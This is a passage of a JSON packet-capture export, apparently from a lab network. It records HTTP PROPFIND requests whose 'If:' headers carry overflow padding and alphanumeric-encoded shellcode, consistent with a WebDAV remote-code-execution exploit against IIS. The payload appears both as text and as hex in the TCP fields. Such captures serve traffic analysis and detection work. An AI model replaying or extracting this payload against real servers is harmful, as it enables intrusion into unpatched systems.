"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/aLpjXsXuOFxsTlnYszaMBngDQEAFXrUgxEaNgSlnSLHuShnVeOFRKxCIopfWPIVoCVYhmLrbyUUjxbFeTnWYmjnxGfCZP<5A><50><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/zAPuSqtJKefnkgfqjiMXaNDEDmfUkpHqOlRgNRyEPACLhUKjZJfSmGqtSFczZLuNMxLucAVYXqaoUUuirGxqTnBVbLFKJ<4B><4A><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "318"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.788009000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.788009000",
|
||
"frame.time_delta": "0.000005000",
|
||
"frame.time_delta_displayed": "0.003903000",
|
||
"frame.time_relative": "17.038949000",
|
||
"frame.number": "325",
|
||
"frame.len": "313",
|
||
"frame.cap_len": "313",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "299",
|
||
"ip.id": "0x0000aa2f",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00008636",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "36559",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "36559",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "54",
|
||
"tcp.len": "247",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "311918687",
|
||
"tcp.nxtseq": "1696",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "525177856",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00008ad6",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:33:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:33:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868595",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000344000",
|
||
"tcp.analysis.bytes_in_flight": "1695",
|
||
"tcp.analysis.push_bytes_sent": "1695"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000593000",
|
||
"tcp.time_delta": "0.000005000"
|
||
},
|
||
"tcp.payload": "72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "324",
|
||
"tcp.segment": "325",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1695",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:66:47:53:6d:79:61:6a:4d:42:49:73:43:45:63:76:73:56:63:44:61:6b:46:4e:66:7a:6c:70:77:48:43:6b:76:66:63:71:6e:72:71:6d:4d:74:5a:68:6f:50:67:4d:68:67:68:51:4a:71:41:43:5a:72:69:73:65:4f:4a:76:52:41:69:6f:66:6f:75:41:51:48:45:67:64:63:50:4d:79:55:6a:4a:5a:54:73:5a:4d:52:72:68:75:e4:89:81:e4:a1:8b:e5:85:98:e6:b5:8a:e5:81:93:e6:85:8d:e5:a9:95:e7:a1:a6:e4:8d:ae:e5:91:99:e6:99:93:e6:8d:b1:e5:81:88:e4:91:ac:e4:a5:a8:e6:b9:8f:c8:82:c8:82:e1:8b:80:e6:a0:83:e6:ad:b4:e4:95:90:e6:bd:ba:e6:b1:84:e4:a5:a4:e5:85:b7:e6:91:97:e7:9d:b2:e6:91:b2:e4:9d:91:e5:a1:90:e6:a5:a2:e5:a1:84:e7:95:a9:e5:a1:aa:e6:89:83:e6:bd:94:e6:b9:a7:e4:a9:b9:e7:a9:91:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:6a:50:4b:68:50:67:75:54:63:73:42:74:43:48:53:5a:67:6c:7a:76:71:64:4d:53:6d:63:71:55:53:4d:48:53:74:54:68:44:70:4b:41:66:42:71:68:69:54:53:4e:70:6a:69:74:6e:59:6f:61:4f:44:58:4f:48:65:41:41:72:5a:4b:68:66:77:41:57:6c:58:51:5a:58:79:6a:45:79:65:4d:77:57:44:4a:73:63:6f:78:71:75:e7:81:81:e4:a5:a1:e7:a5:ad:e7:81:a6:e5:91:98:e7:a1:96:e5:a9:af:e5:a9:9a:e6:8d:ab:e7:a9:ae:e4:b1:97:e4:b5:b7:e7:9d:9a:e5:9d:b9:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e6:9d:81:e6:91:b2:e5:81:8e:e6:89:af:e1:8f:80:e6:a0:83:e4:ad:8e:e5:8d:9a:e6:85:ad:e5:9d:ae:e4:85:91:e5:91:b6:e4:a9:a5:e6:9d:8f:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/fGSmyajMBIsCEcvsVcDakFNfzlpwHCkvfcqnrqmMtZhoPgMhghQJqACZriseOJvRAiofouAQHEgdcPMyUjJZTsZMRrhu<68><75><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/jPKhPguTcsBtCHSZglzvqdMSmcqUSMHStThDpKAfBqhiTSNpjitnYoaODXOHeAArZKhfwAWlXQZXyjEyeMwWDJscoxqu<71><75><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBF